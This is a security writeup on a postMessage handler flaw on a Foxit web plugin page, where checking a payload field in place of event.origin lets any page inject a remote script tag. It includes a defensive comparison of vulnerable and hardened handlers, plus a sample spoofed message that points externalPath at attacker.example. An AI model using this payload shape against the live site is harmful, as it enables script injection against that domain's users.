Foxit Web Plugins (webplugins.foxit.com/calculator/commands.html)
Identified on the live production domain.
A postMessage handler fails to validate the actual sender’s origin, allowing an attacker to inject a remote script tag into the Foxit domain.
The handler incorrectly validates event.data.origin (a string inside the attacker-controlled JSON payload) instead of the browser-enforced event.origin. By passing {"origin": "FoxitApp"}, an attacker can reach a code path that accepts an externalPath URL and appends it to the DOM as a new <script> tag.
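To make the flaw concrete from a defender's point of view, the following is an added example (not Foxit's code, and not taken from the plugin page) that models the two handler patterns side by side. Each handler takes a MessageEvent-like object and returns the script URL it would append to the DOM, or null when it rejects the message; the DOM is stood in for by a plain array so the block runs under Node without a browser. The allowlists, the sample messages and the hostnames attacker.example and webplugins.foxit.com used in them are constructed for the example.

```javascript
// Added example: models the event.data.origin vs event.origin mistake.
// Assumed allowlists (not from the page); a real deployment would populate these
// with the exact origins and script hosts the plugin legitimately talks to.
const TRUSTED_ORIGINS = new Set(["https://webplugins.foxit.com"]);
const TRUSTED_SCRIPT_HOSTS = new Set(["webplugins.foxit.com"]);

// postMessage data may arrive as a JSON string or as an object; normalise it.
function parsePayload(data) {
  if (typeof data === "string") {
    try { return JSON.parse(data); } catch (e) { return null; }
  }
  return data && typeof data === "object" ? data : null;
}

// Weak pattern described in the writeup: the "origin" checked is a field inside
// the attacker-controlled payload, so any sender can satisfy it.
function vulnerableHandler(event, dom) {
  const msg = parsePayload(event.data);
  if (!msg || msg.origin !== "FoxitApp") return null;
  if (typeof msg.externalPath !== "string") return null;
  dom.push(msg.externalPath);            // stands in for appending a <script src> tag
  return msg.externalPath;
}

// Hardened pattern: check the browser-enforced event.origin against an allowlist
// first, then constrain the script URL to https on a trusted host.
function hardenedHandler(event, dom) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return null;
  const msg = parsePayload(event.data);
  if (!msg || typeof msg.externalPath !== "string") return null;
  let url;
  try {
    url = new URL(msg.externalPath, "https://webplugins.foxit.com/");
  } catch (e) {
    return null;                          // unparsable path: reject
  }
  if (url.protocol !== "https:" || !TRUSTED_SCRIPT_HOSTS.has(url.hostname)) return null;
  dom.push(url.href);
  return url.href;
}

// Constructed sample messages: one spoofed by a cross-origin page, one legitimate.
const spoofedMessage = {
  origin: "https://attacker.example",    // what the browser reports; cannot be forged
  data: JSON.stringify({ origin: "FoxitApp", externalPath: "https://attacker.example/x.js" })
};
const legitimateMessage = {
  origin: "https://webplugins.foxit.com",
  data: { externalPath: "/calculator/ui.js" }
};

// Runs both handlers over both messages and reports what each would load.
function compareHandlers() {
  return {
    vulnerableSpoofed: vulnerableHandler(spoofedMessage, []),
    hardenedSpoofed: hardenedHandler(spoofedMessage, []),
    vulnerableLegit: vulnerableHandler(legitimateMessage, []),
    hardenedLegit: hardenedHandler(legitimateMessage, [])
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(compareHandlers());
}
```

The hardened version also rejects the legitimate-looking message if it lacks the in-band "origin" marker only because that marker is no longer consulted at all: the browser-supplied event.origin is the sole authority on who sent the message, and the script path is validated independently of it. In a real handler the origin allowlist should be exact string matches (no startsWith or regex), and the page should additionally consider a Content-Security-Policy script-src that excludes untrusted hosts as a second layer, so that even a future logic error in the handler cannot load a remote script.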